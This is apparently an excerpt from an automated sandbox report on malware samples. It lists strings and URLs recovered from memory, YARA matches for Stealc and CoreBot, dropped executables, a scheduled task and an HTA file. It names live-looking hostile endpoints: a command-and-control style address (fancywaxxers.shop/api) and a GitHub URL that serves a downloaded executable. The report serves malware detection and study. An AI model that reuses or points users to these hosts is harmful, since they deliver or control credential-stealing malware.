                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298331003.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                      Source: powershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lg
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/5
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/E
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/K
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/X
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789101264.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1785065258.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1794078813.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1837153141.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api)
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api92
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789101264.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1794078813.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1837153141.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api;
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiM
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/e
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726867792.000000000142D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe
                                      Source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloading
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/NQRAENMvsyyuOJH.exesvchost.exe
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.0000000000897000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.0000000000897000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

                                      System Summary

                                      barindex
                                      Malicious sample detected (through community Yara rule)
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                                      Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                                      Creates HTA files
                                      Source: C:\Windows\System32\cmd.exeFile created: C:\Temp\random.hta
                                      PE file contains section with special chars
                                      Source: 5EfYBe3nch.exeStatic PE information: section name:
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: .idata
                                      Source: 5EfYBe3nch.exeStatic PE information: section name:
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name:
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name: .idata
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name:
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: .idata
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name:
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: .idata
                                      Source: random[1].exe.2.drStatic PE information: section name:
                                      Source: random[1].exe.2.drStatic PE information: section name: .idata
                                      Source: skotes.exe.5.drStatic PE information: section name:
                                      Source: skotes.exe.5.drStatic PE information: section name: .idata
                                      Source: random[1].exe.15.drStatic PE information: section name:
                                      Source: random[1].exe.15.drStatic PE information: section name: .idata
                                      Source: random[1].exe.15.drStatic PE information: section name:
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name:
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: .idata
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: .idata
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: .idata
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name:
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name:
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: .idata
                                      PE file has nameless sections
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Powershell drops PE file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,2_2_6C5862C0
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeFile deleted: C:\Windows\Tasks\skotes.jobJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C40AC602_2_6C40AC60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C6C002_2_6C4C6C00
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DAC302_2_6C4DAC30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45ECD02_2_6C45ECD0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3FECC02_2_6C3FECC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C52AD502_2_6C52AD50
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CED702_2_6C4CED70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C588D202_2_6C588D20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C58CDC02_2_6C58CDC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C496D902_2_6C496D90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C404DB02_2_6C404DB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C49EE702_2_6C49EE70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E0E202_2_6C4E0E20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C40AEC02_2_6C40AEC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4A0EC02_2_6C4A0EC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C486E902_2_6C486E90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46EF402_2_6C46EF40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C2F702_2_6C4C2F70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C406F102_2_6C406F10
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C540F202_2_6C540F20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C400FE02_2_6C400FE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DEFF02_2_6C4DEFF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C548FB02_2_6C548FB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C40EFB02_2_6C40EFB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D48402_2_6C4D4840
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4508202_2_6C450820
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C48A8202_2_6C48A820
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5068E02_2_6C5068E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4389602_2_6C438960
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4569002_2_6C456900
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C51C9E02_2_6C51C9E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4349F02_2_6C4349F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4909A02_2_6C4909A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4BA9A02_2_6C4BA9A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C09B02_2_6C4C09B0
